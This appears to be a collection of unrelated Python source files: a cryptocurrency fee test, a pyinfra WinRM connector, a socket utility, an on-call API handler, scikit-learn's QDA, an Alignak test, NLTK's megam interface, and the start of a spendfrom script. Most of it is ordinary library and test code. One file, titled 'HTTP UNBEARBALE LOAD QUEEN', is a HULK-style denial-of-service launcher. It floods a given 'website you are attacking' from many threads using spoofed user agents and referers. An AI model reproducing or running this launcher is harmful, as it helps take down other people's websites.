0.00001000)\n # and the following calls should both succeed\n testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned[\'hex\']])[0]\n assert_equal(testres[\'allowed\'], True)\n self.nodes[2].sendrawtransaction(hexstring=rawTxSigned[\'hex\'])\n\n # Test a transaction with a large fee.\n txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)\n rawTx = self.nodes[0].getrawtransaction(txId, True)\n vout = next(o for o in rawTx[\'vout\'] if o[\'value\'] == Decimal(\'1.00000000\'))\n\n self.sync_all()\n inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'] }]\n # Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98\n outputs = { self.nodes[0].getnewaddress() : Decimal(""0.98000000"") }\n rawTx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)\n assert_equal(rawTxSigned[\'complete\'], True)\n # Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB\n # Thus, testmempoolaccept should reject\n testres = self.nodes[2].testmempoolaccept([rawTxSigned[\'hex\']])[0]\n assert_equal(testres[\'allowed\'], False)\n assert_equal(testres[\'reject-reason\'], \'max-fee-exceeded\')\n # and sendrawtransaction should throw\n assert_raises_rpc_error(-25, \'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)\', self.nodes[2].sendrawtransaction, rawTxSigned[\'hex\'])\n # and the following calls should both succeed\n testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned[\'hex\']], maxfeerate=\'0.20000000\')[0]\n assert_equal(testres[\'allowed\'], True)\n self.nodes[2].sendrawtransaction(hexstring=rawTxSigned[\'hex\'], maxfeerate=\'0.20000000\')\n\n\nif __name__ == \'__main__\':\n RawTransactionsTest().main()\n', 'from __future__ import print_function, unicode_literals\n\nimport base64\nimport ntpath\n\nimport click\n\nfrom pyinfra import logger\nfrom pyinfra.api import Config\nfrom pyinfra.api.exceptions import ConnectError, PyinfraError\nfrom pyinfra.api.util import get_file_io, memoize, sha1_hash\n\nfrom .pyinfrawinrmsession import PyinfraWinrmSession\nfrom .util import make_win_command\n\n\ndef _raise_connect_error(host, message, data):\n message = \'{0} ({1})\'.format(message, data)\n raise ConnectError(message)\n\n\n@memoize\ndef show_warning():\n logger.warning(\'The @winrm connector is alpha!\')\n\n\ndef _make_winrm_kwargs(state, host):\n kwargs = {\n }\n\n for key, value in (\n (\'username\', host.data.winrm_user),\n (\'password\', host.data.winrm_password),\n (\'winrm_port\', int(host.data.winrm_port or 0)),\n (\'winrm_transport\', host.data.winrm_transport or \'plaintext\'),\n (\'winrm_read_timeout_sec\', host.data.winrm_read_timeout_sec or 30),\n (\'winrm_operation_timeout_sec\', host.data.winrm_operation_timeout_sec or 20),\n ):\n if value:\n kwargs[key] = value\n\n # FUTURE: add more auth\n # pywinrm supports: basic, certificate, ntlm, kerberos, plaintext, ssl, credssp\n # see https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py#L12\n\n return kwargs\n\n\ndef make_names_data(hostname):\n\n show_warning()\n\n yield dummy@email.com(hostname), {\'winrm_hostname\': hostname}, []\n\n\ndef connect(state, host):\n \'\'\'\n Connect to a single host. Returns the winrm Session if successful.\n \'\'\'\n\n kwargs = _make_winrm_kwargs(state, host)\n logger.debug(\'Connecting to: %s (%s)\', host.name, kwargs)\n\n # Hostname can be provided via winrm config (alias), data, or the hosts name\n hostname = kwargs.pop(\n \'hostname\',\n host.data.winrm_hostname or host.name,\n )\n\n try:\n # Create new session\n host_and_port = \'{}:{}\'.format(hostname, host.data.winrm_port)\n logger.debug(\'host_and_port: %s\', host_and_port)\n\n session = PyinfraWinrmSession(\n host_and_port,\n auth=(\n kwargs[\'username\'],\n kwargs[\'password\'],\n ),\n transport=kwargs[\'winrm_transport\'],\n read_timeout_sec=kwargs[\'winrm_read_timeout_sec\'],\n operation_timeout_sec=kwargs[\'winrm_operation_timeout_sec\'],\n )\n\n return session\n\n # TODO: add exceptions here\n except Exception as e:\n auth_kwargs = {}\n\n for key, value in kwargs.items():\n if key in (\'username\', \'password\'):\n auth_kwargs[key] = value\n\n auth_args = \', \'.join(\n \'{0}={1}\'.format(key, value)\n for key, value in auth_kwargs.items()\n )\n logger.debug(\'%s\', e)\n _raise_connect_error(host, \'Authentication error\', auth_args)\n\n\ndef run_shell_command(\n state, host, command,\n env=None,\n success_exit_codes=None,\n print_output=False,\n print_input=False,\n return_combined_output=False,\n shell_executable=Config.SHELL,\n **ignored_command_kwargs\n):\n \'\'\'\n Execute a command on the specified host.\n\n Args:\n state (``pyinfra.api.State`` obj): state object for this command\n hostname (string): hostname of the target\n command (string): actual command to execute\n success_exit_codes (list): all values in the list that will return success\n print_output (boolean): print the output\n print_intput (boolean): print the input\n return_combined_output (boolean): combine the stdout and stderr lists\n shell_executable (string): shell to use - \'cmd\'=cmd, \'ps\'=powershell(default)\n env (dict): environment variables to set\n\n Returns:\n tuple: (exit_code, stdout, stderr)\n stdout and stderr are both lists of strings from each buffer.\n \'\'\'\n\n command = make_win_command(command)\n\n logger.debug(\'Running command on %s: %s\', host.name, command)\n\n if print_input:\n click.echo(\'{0}>>> {1}\'.format(host.print_prefix, command), err=True)\n\n # get rid of leading/trailing quote\n tmp_command = command.strip(""\'"")\n\n if print_output:\n click.echo(\n \'{0}>>> {1}\'.format(host.print_prefix, command),\n err=True,\n )\n\n if not shell_executable:\n shell_executable = \'ps\'\n logger.debug(\'shell_executable:%s\', shell_executable)\n\n # we use our own subclassed session that allows for env setting from open_shell.\n if shell_executable in [\'cmd\']:\n response = host.connection.run_cmd(tmp_command, env=env)\n else:\n response = host.connection.run_ps(tmp_command, env=env)\n\n return_code = response.status_code\n logger.debug(\'response:%s\', response)\n\n std_out_str = response.std_out.decode(\'utf-8\')\n std_err_str = response.std_err.decode(\'utf-8\')\n\n # split on \'\\r\\n\' (windows newlines)\n std_out = std_out_str.split(\'\\r\\n\')\n std_err = std_err_str.split(\'\\r\\n\')\n\n logger.debug(\'std_out:%s\', std_out)\n logger.debug(\'std_err:%s\', std_err)\n\n if print_output:\n click.echo(\n \'{0}>>> {1}\'.format(host.print_prefix, \'\\n\'.join(std_out)),\n err=True,\n )\n\n if success_exit_codes:\n status = return_code in success_exit_codes\n else:\n status = return_code == 0\n\n logger.debug(\'Command exit status: %s\', status)\n\n if return_combined_output:\n std_out = [(\'stdout\', line) for line in std_out]\n std_err = [(\'stderr\', line) for line in std_err]\n return status, std_out + std_err\n\n return status, std_out, std_err\n\n\ndef get_file(\n state, host, remote_filename, filename_or_io,\n **command_kwargs\n):\n raise PyinfraError(\'Not implemented\')\n\n\ndef _put_file(state, host, filename_or_io, remote_location, chunk_size=2048):\n # this should work fine on smallish files, but there will be perf issues\n # on larger files both due to the full read, the base64 encoding, and\n # the latency when sending chunks\n with get_file_io(filename_or_io) as file_io:\n data = file_io.read()\n for i in range(0, len(data), chunk_size):\n chunk = data[i:i + chunk_size]\n ps = (\n \'$data = [System.Convert]::FromBase64String(""{0}""); \'\n \'{1} -Value $data -Encoding byte -Path ""{2}""\'\n ).format(\n base64.b64encode(chunk).decode(\'utf-8\'),\n \'Set-Content\' if i == 0 else \'Add-Content\',\n remote_location)\n status, _stdout, stderr = run_shell_command(state, host, ps)\n if status is False:\n logger.error(\'File upload error: {0}\'.format(\'\\n\'.join(stderr)))\n return False\n\n return True\n\n\ndef put_file(\n state, host, filename_or_io, remote_filename,\n print_output=False, print_input=False,\n **command_kwargs\n):\n \'\'\'\n Upload file by chunking and sending base64 encoded via winrm\n \'\'\'\n\n # Always use temp file here in case of failure\n temp_file = ntpath.join(\n host.fact.windows_temp_dir(),\n \'pyinfra-{0}\'.format(sha1_hash(remote_filename)),\n )\n\n if not _put_file(state, host, filename_or_io, temp_file):\n return False\n\n # Execute run_shell_command w/sudo and/or su_user\n command = \'Move-Item -Path {0} -Destination {1} -Force\'.format(temp_file, remote_filename)\n status, _, stderr = run_shell_command(\n state, host, command,\n print_output=print_output,\n print_input=print_input,\n **command_kwargs\n )\n\n if status is False:\n logger.error(\'File upload error: {0}\'.format(\'\\n\'.join(stderr)))\n return False\n\n if print_output:\n click.echo(\n \'{0}file uploaded: {1}\'.format(host.print_prefix, remote_filename),\n err=True,\n )\n\n return True\n\n\nEXECUTION_CONNECTOR = True\n', '#\n# (C) Copyright 2011 Jacek Konieczny dummy@email.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License Version\n# 2.1 as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n#\n# pylint: disable-msg=W0201\n\n""""""Utility functions to wait until a socket (or object implementing .fileno()\nin POSIX) is ready for input or output.""""""\n\nfrom __future__ import absolute_import, division\n\n__docformat__ = ""restructuredtext en""\n\nimport select\n\nif hasattr(select, ""poll""):\n def wait_for_read(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for reading.\n """"""\n if timeout is not None:\n timeout *= 1000\n poll = select.poll()\n poll.register(socket, select.POLLIN)\n events = poll.poll(timeout)\n return bool(events)\n def wait_for_write(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for writing.\n """"""\n if timeout is not None:\n timeout *= 1000\n poll = select.poll()\n poll.register(socket, select.POLLOUT)\n events = poll.poll(timeout)\n return bool(events)\nelse:\n def wait_for_read(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for reading.\n """"""\n readable = select.select([socket], [], [], timeout)[0]\n return bool(readable)\n def wait_for_write(socket, timeout = None):\n """"""Wait up to `timeout` seconds until `socket` is ready for writing.\n """"""\n writable = select.select([], [socket], [], timeout)[1]\n return bool(writable)\n\n', '""""""\r\nHTTP UNBEARBALE LOAD QUEEN\r\nA HULK EDIT BY @OBN0XIOUS\r\nTHE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY\r\n""""""\r\n\r\nimport sys\r\nimport argparse\r\nimport random\r\nfrom threading import Thread\r\n\r\nimport hulqThreading\r\nimport hulqRequest\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\'--threads\', \'-t\', default=2, help=\'Choose how many threads.\')\r\nparser.add_argument(\'--website\', \'-w\', help=\'Website you are attacking.\')\r\nsystemArguments = parser.parse_args()\r\n\r\nif not systemArguments.website:\r\n\tsys.exit(""Provide -w or --website."")\r\n\r\nuserAgents = \\\r\n\t(\r\n\t\'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:127.0.0.1 Gecko/20090913 Firefox/3.5.3\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:127.0.0.1 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:127.0.0.1 Gecko/20090718 Firefox/3.5.1\', \\\r\n\t\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US AppleWebKit/532.1 (KHTML, \\ like Gecko Chrome/4.0.219.6 Safari/532.1\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2\', \\\r\n\t\'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US\', \\\r\n\t\'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP\', \\\r\n\t\'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51\'\t\r\n\t)\r\n\r\n\r\nreferers = \\\r\n\t(\r\n\t\t\'http://www.google.com/?q=\', \\\r\n\t\t\'http://www.usatoday.com/search/results?q=\', \\\r\n\t\t\'http://engadget.search.aol.com/search?q=\'\r\n\t\t)\r\n\r\n\r\n\r\nfor i in range(0, int(systemArguments.threads)):\r\n\treferer = random.choice(referers)\r\n\tuserAgent = random.choice(userAgents)\r\n\tt1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))\r\n\tt1.start()\r\n', '# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.\n# See LICENSE in the project root for license information.\nimport json\nimport time\nfrom .events import on_get as get_events\nfrom collections import defaultdict\nimport requests\nfrom ujson import dumps as json_dumps\nfrom falcon import HTTPStatus, HTTP_200\n\n\nclass PaidEvents(object):\n def __init__(self, config):\n self.config = config\n\n def on_get(self, req, resp):\n """"""\n Search for events. Allows filtering based on a number of parameters,\n detailed below. Also returns only the users who are paid to be on call. Uses response from\n oncall-bonus to identify paid status.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1\n Host: example.com\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Type: application/json\n\n {\n ""ldap_user_id"":\n [\n {\n ""start"": 1488441600,\n ""end"": 1489132800,\n ""team"": ""foo-sre"",\n ""link_id"": null,\n ""schedule_id"": null,\n ""role"": ""primary"",\n ""user"": ""foo"",\n ""full_name"": ""Foo Icecream"",\n ""id"": 187795\n },\n {\n ""start"": 1488441600,\n ""end"": 1489132800,\n ""team"": ""foo-sre"",\n ""link_id"": ""PI:KEY"",\n ""schedule_id"": 123,\n ""role"": ""primary"",\n ""user"": ""bar"",\n ""full_name"": ""Bar Apple"",\n ""id"": 187795\n }\n ]\n ]\n\n :query team: team name\n :query user: user name\n :query role: role name\n :query id: id of the event\n :query start: start time (unix timestamp) of event\n :query end: end time (unix timestamp) of event\n :query start__gt: start time (unix timestamp) greater than\n :query start__ge: start time (unix timestamp) greater than or equal\n :query start__lt: start time (unix timestamp) less than\n :query start__le: start time (unix timestamp) less than or equal\n :query end__gt: end time (unix timestamp) greater than\n :query end__ge: end time (unix timestamp) greater than or equal\n :query end__lt: end time (unix timestamp) less than\n :query end__le: end time (unix timestamp) less than or equal\n :query role__eq: role name\n :query role__contains: role name contains param\n :query role__startswith: role name starts with param\n :query role__endswith: role name ends with param\n :query team__eq: team name\n :query team__contains: team name contains param\n :query team__startswith: team name starts with param\n :query team__endswith: team name ends with param\n :query team_id: team id\n :query user__eq: user name\n :query user__contains: user name contains param\n :query user__startswith: user name starts with param\n :query user__endswith: user name ends with param\n\n :statuscode 200: no error\n :statuscode 400: bad request\n """"""\n\n config = self.config\n oncall_bonus_blacklist = config.get(\'bonus_blacklist\', [])\n oncall_bonus_whitelist = config.get(\'bonus_whitelist\', [])\n bonus_url = config.get(\'bonus_url\', None)\n ldap_grouping = defaultdict(list)\n\n # if start time is not specified only fetch events in the future\n if not req.params.get(\'start__gt\'):\n req.params[\'start__gt\'] = str(int(time.time()))\n\n get_events(req, resp)\n\n # fetch team data from an externall oncall-bonus api\n try:\n bonus_response = requests.get(bonus_url)\n bonus_response.raise_for_status()\n except requests.exceptions.RequestException:\n raise HTTPStatus(\'503 failed to contact oncall-bonus API\')\n\n oncall_bonus_teams = bonus_response.json()\n\n for event in json.loads(resp.body):\n if event[\'role\'].lower() == \'manager\':\n continue\n\n team = event[\'team\']\n if team in oncall_bonus_whitelist:\n ldap_grouping[event[\'user\']].append(event)\n continue\n if team in oncall_bonus_blacklist:\n continue\n\n # check if event\'s role is payed for that team\n team_payment_details = next((item for item in oncall_bonus_teams if item.get(\'name\', \'\') == team), None)\n if team_payment_details:\n team_payed_roles = {\'primary\': team_payment_details.get(\'primary_paid\', 0), \'secondary\': team_payment_details.get(\'secondary_paid\', 0)}\n if team_payed_roles.get(event[\'role\']):\n ldap_grouping[event[\'user\']].append(event)\n\n resp.status = HTTP_200\n resp.body = json_dumps(ldap_grouping)\n', '""""""\nQuadratic Discriminant Analysis\n""""""\n\n# Author: Matthieu Perrot dummy@email.com\n#\n# License: BSD Style.\n\nimport warnings\n\nimport numpy as np\nimport scipy.ndimage as ndimage\n\nfrom .base import BaseEstimator, ClassifierMixin\n\n\n# FIXME :\n# - in fit(X, y) method, many checks are common with other models\n# (in particular LDA model) and should be factorized:\n# maybe in BaseEstimator ?\n\nclass QDA(BaseEstimator, ClassifierMixin):\n """"""\n Quadratic Discriminant Analysis (QDA)\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n y : array, shape = [n_samples]\n Target vector relative to X\n\n priors : array, optional, shape = [n_classes]\n Priors on classes\n\n Attributes\n ----------\n `means_` : array-like, shape = [n_classes, n_features]\n Class means\n `priors_` : array-like, shape = [n_classes]\n Class priors (sum to 1)\n `covariances_` : list of array-like, shape = [n_features, n_features]\n Covariance matrices of each class\n\n Examples\n --------\n >>> from sklearn.qda import QDA\n >>> import numpy as np\n >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n >>> y = np.array([1, 1, 1, 2, 2, 2])\n >>> clf = QDA()\n >>> clf.fit(X, y)\n QDA(priors=None)\n >>> print clf.predict([[-0.8, -1]])\n [1]\n\n See also\n --------\n LDA\n """"""\n\n def __init__(self, priors=None):\n self.priors = np.asarray(priors) if priors is not None else None\n\n def fit(self, X, y, store_covariances=False, tol=1.0e-4):\n """"""\n Fit the QDA model according to the given training data and parameters.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n y : array, shape = [n_samples]\n Target values (integers)\n store_covariances : boolean\n If True the covariance matrices are computed and stored in the\n self.covariances_ attribute.\n """"""\n X = np.asarray(X)\n y = np.asarray(y)\n if X.ndim != 2:\n raise ValueError(\'X must be a 2D array\')\n if X.shape[0] != y.shape[0]:\n raise ValueError(\n \'Incompatible shapes: X has %s samples, while y \'\n \'has %s\' % (X.shape[0], y.shape[0]))\n if y.dtype.char.lower() not in (\'b\', \'h\', \'i\'):\n # We need integer values to be able to use\n # ndimage.measurements and np.bincount on numpy >= 2.0.\n # We currently support (u)int8, (u)int16 and (u)int32.\n # Note that versions of scipy >= 0.8 can also accept\n # (u)int64. We however don\'t support it for backwards\n # compatibility.\n y = y.astype(np.int32)\n n_samples, n_features = X.shape\n classes = np.unique(y)\n n_classes = classes.size\n if n_classes < 2:\n raise ValueError(\'y has less than 2 classes\')\n classes_indices = [(y == c).ravel() for c in classes]\n if self.priors is None:\n counts = np.array(ndimage.measurements.sum(\n np.ones(n_samples, dtype=y.dtype), y, index=classes))\n self.priors_ = counts / float(n_samples)\n else:\n self.priors_ = self.priors\n\n cov = None\n if store_covariances:\n cov = []\n means = []\n scalings = []\n rotations = []\n for group_indices in classes_indices:\n Xg = X[group_indices, :]\n meang = Xg.mean(0)\n means.append(meang)\n Xgc = Xg - meang\n # Xgc = U * S * V.T\n U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)\n rank = np.sum(S > tol)\n if rank < n_features:\n warnings.warn(""Variables are collinear"")\n S2 = (S ** 2) / (len(Xg) - 1)\n if store_covariances:\n # cov = V * (S^2 / (n-1)) * V.T\n cov.append(np.dot(S2 * Vt.T, Vt))\n scalings.append(S2)\n rotations.append(Vt.T)\n if store_covariances:\n self.covariances_ = cov\n self.means_ = np.asarray(means)\n self.scalings = np.asarray(scalings)\n self.rotations = rotations\n self.classes = classes\n return self\n\n def decision_function(self, X):\n """"""Apply decision function to an array of samples.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Array of samples (test vectors).\n\n Returns\n -------\n C : array, shape = [n_samples, n_classes]\n Decision function values related to each class, per sample.\n """"""\n X = np.asarray(X)\n norm2 = []\n for i in range(len(self.classes)):\n R = self.rotations[i]\n S = self.scalings[i]\n Xm = X - self.means_[i]\n X2 = np.dot(Xm, R * (S ** (-0.5)))\n norm2.append(np.sum(X2 ** 2, 1))\n norm2 = np.array(norm2).T # shape = [len(X), n_classes]\n return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))\n + np.log(self.priors_))\n\n def predict(self, X):\n """"""Perform classification on an array of test vectors X.\n\n The predicted class C for each sample in X is returned.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n\n Returns\n -------\n C : array, shape = [n_samples]\n """"""\n d = self.decision_function(X)\n y_pred = self.classes[d.argmax(1)]\n return y_pred\n\n def predict_proba(self, X):\n """"""Return posterior probabilities of classification.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Array of samples/test vectors.\n\n Returns\n -------\n C : array, shape = [n_samples, n_classes]\n Posterior probabilities of classification per class.\n """"""\n values = self.decision_function(X)\n # compute the likelihood of the underlying gaussian models\n # up to a multiplicative constant.\n likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])\n # compute posterior probabilities\n return likelihood / likelihood.sum(axis=1)[:, np.newaxis]\n\n def predict_log_proba(self, X):\n """"""Return posterior probabilities of classification.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Array of samples/test vectors.\n\n Returns\n -------\n C : array, shape = [n_samples, n_classes]\n Posterior log-probabilities of classification per class.\n """"""\n # XXX : can do better to avoid precision overflows\n probas_ = self.predict_proba(X)\n return np.log(probas_)\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors\n#\n# This file is part of Alignak.\n#\n# Alignak is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Alignak is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with Alignak. If not, see .\n#\n#\n# This file incorporates work covered by the following copyright and\n# permission notice:\n#\n# Copyright (C) 2009-2014:\n# Jean Gabes, dummy@email.com\n# Hartmut Goebel, dummy@email.com\n# Grégory Starck, dummy@email.com\n# Zoran Zaric, dummy@email.com\n# Sebastien Coavoux, dummy@email.com\n\n# This file is part of Shinken.\n#\n# Shinken is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Shinken is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with Shinken. If not, see .\n\n#\n# This file is used to test reading and processing of config files\n#\n\nfrom alignak_test import *\n\n\nclass TestConfig(AlignakTest):\n def setUp(self):\n self.setup_with_file(\'etc/alignak_resultmodulation.cfg\')\n\n def get_svc(self):\n return self.sched.services.find_srv_by_name_and_hostname(""test_host_0"", ""test_ok_0"")\n\n def get_host(self):\n return self.sched.hosts.find_by_name(""test_host_0"")\n\n def get_router(self):\n return self.sched.hosts.find_by_name(""test_router_0"")\n\n def test_service_resultmodulation(self):\n svc = self.get_svc()\n host = self.get_host()\n router = self.get_router()\n\n self.scheduler_loop(2, [[host, 0, \'UP | value1=1 value2=2\'], [svc, 2, \'BAD | value1=0 value2=0\'],])\n self.assertEqual(\'UP\', host.state)\n self.assertEqual(\'HARD\', host.state_type)\n\n # This service got a result modulation. So Criticals are in fact\n # Warnings. So even with some CRITICAL (2), it must be warning\n self.assertEqual(\'WARNING\', svc.state)\n\n # If we remove the resultmodulations, we should have theclassic behavior\n svc.resultmodulations = []\n self.scheduler_loop(2, [[host, 0, \'UP | value1=1 value2=2\'], [svc, 2, \'BAD | value1=0 value2=0\']])\n self.assertEqual(\'CRITICAL\', svc.state)\n\n # Now look for the inheritaed thing\n # resultmodulation is a inplicit inherited parameter\n # and router define it, but not test_router_0/test_ok_0. So this service should also be impacted\n svc2 = self.sched.services.find_srv_by_name_and_hostname(""test_router_0"", ""test_ok_0"")\n self.assertEqual(router.resultmodulations, svc2.resultmodulations)\n\n self.scheduler_loop(2, [[svc2, 2, \'BAD | value1=0 value2=0\']])\n self.assertEqual(\'WARNING\', svc2.state)\n\n\nif __name__ == \'__main__\':\n unittest.main()\n', '# Natural Language Toolkit: Interface to Megam Classifier\n#\n# Copyright (C) 2001-2010 NLTK Project\n# Author: Edward Loper dummy@email.com\n# URL: \n# For license information, see LICENSE.TXT\n#\n# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $\n\n""""""\nA set of functions used to interface with the external U{megam\n} maxent optimization package.\nBefore C{megam} can be used, you should tell NLTK where it can find\nthe C{megam} binary, using the L{config_megam()} function. Typical\nusage:\n\n >>> import nltk\n >>> nltk.config_megam(\'.../path/to/megam\')\n >>> classifier = nltk.MaxentClassifier.train(corpus, \'megam\')\n\n""""""\n__docformat__ = \'epytext en\'\n\nimport os\nimport os.path\nimport subprocess\n\nfrom nltk.internals import find_binary\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n######################################################################\n#{ Configuration\n######################################################################\n\n_megam_bin = None\ndef config_megam(bin=None):\n """"""\n Configure NLTK\'s interface to the C{megam} maxent optimization\n package.\n\n @param bin: The full path to the C{megam} binary. If not specified,\n then nltk will search the system for a C{megam} binary; and if\n one is not found, it will raise a C{LookupError} exception.\n @type bin: C{string}\n """"""\n global _megam_bin\n _megam_bin = find_binary(\n \'megam\', bin,\n env_vars=[\'MEGAM\', \'MEGAMHOME\'],\n binary_names=[\'megam.opt\', \'megam\', \'megam_686\', \'megam_i686.opt\'],\n url=\'http://www.cs.utah.edu/~hal/megam/\')\n\n######################################################################\n#{ Megam Interface Functions\n######################################################################\n\ndef write_megam_file(train_toks, encoding, stream,\n bernoulli=True, explicit=True):\n """"""\n Generate an input file for C{megam} based on the given corpus of\n classified tokens.\n\n @type train_toks: C{list} of C{tuples} of (C{dict}, C{str})\n @param train_toks: Training data, represented as a list of\n pairs, the first member of which is a feature dictionary,\n and the second of which is a classification label.\n\n @type encoding: L{MaxentFeatureEncodingI}\n @param encoding: A feature encoding, used to convert featuresets\n into feature vectors.\n\n @type stream: C{stream}\n @param stream: The stream to which the megam input file should be\n written.\n\n @param bernoulli: If true, then use the \'bernoulli\' format. I.e.,\n all joint features have binary values, and are listed iff they\n are true. Otherwise, list feature values explicitly. If\n C{bernoulli=False}, then you must call C{megam} with the\n C{-fvals} option.\n\n @param explicit: If true, then use the \'explicit\' format. I.e.,\n list the features that would fire for any of the possible\n labels, for each token. If C{explicit=True}, then you must\n call C{megam} with the C{-explicit} option.\n """"""\n # Look up the set of labels.\n labels = encoding.labels()\n labelnum = dict([(label, i) for (i, label) in enumerate(labels)])\n\n # Write the file, which contains one line per instance.\n for featureset, label in train_toks:\n # First, the instance number.\n stream.write(\'%d\' % labelnum[label])\n\n # For implicit file formats, just list the features that fire\n # for this instance\'s actual label.\n if not explicit:\n _write_megam_features(encoding.encode(featureset, label),\n stream, bernoulli)\n\n # For explicit formats, list the features that would fire for\n # any of the possible labels.\n else:\n for l in labels:\n stream.write(\' #\')\n _write_megam_features(encoding.encode(featureset, l),\n stream, bernoulli)\n\n # End of the isntance.\n stream.write(\'\\n\')\n\ndef parse_megam_weights(s, features_count, explicit=True):\n """"""\n Given the stdout output generated by C{megam} when training a\n model, return a C{numpy} array containing the corresponding weight\n vector. This function does not currently handle bias features.\n """"""\n if numpy is None:\n raise ValueError(\'This function requires that numpy be installed\')\n assert explicit, \'non-explicit not supported yet\'\n lines = s.strip().split(\'\\n\')\n weights = numpy.zeros(features_count, \'d\')\n for line in lines:\n if line.strip():\n fid, weight = line.split()\n weights[int(fid)] = float(weight)\n return weights\n\ndef _write_megam_features(vector, stream, bernoulli):\n if not vector:\n raise ValueError(\'MEGAM classifier requires the use of an \'\n \'always-on feature.\')\n for (fid, fval) in vector:\n if bernoulli:\n if fval == 1:\n stream.write(\' %s\' % fid)\n elif fval != 0:\n raise ValueError(\'If bernoulli=True, then all\'\n \'features must be binary.\')\n else:\n stream.write(\' %s %s\' % (fid, fval))\n\ndef call_megam(args):\n """"""\n Call the C{megam} binary with the given arguments.\n """"""\n if isinstance(args, basestring):\n raise TypeError(\'args should be a list of strings\')\n if _megam_bin is None:\n config_megam()\n\n # Call megam via a subprocess\n cmd = [_megam_bin] + args\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n (stdout, stderr) = p.communicate()\n\n # Check the return code.\n if p.returncode != 0:\n print\n print stderr\n raise OSError(\'megam command failed!\')\n\n return stdout\n\n', '#!/usr/bin/env python\n#\n# Use the raw transactions API to spend ones received on particular addresses,\n# and send any change back to that same address.\n#\n# Example usage:\n# spendfrom.py # Lists available funds\n# spendfrom.py --from=ADDRESS 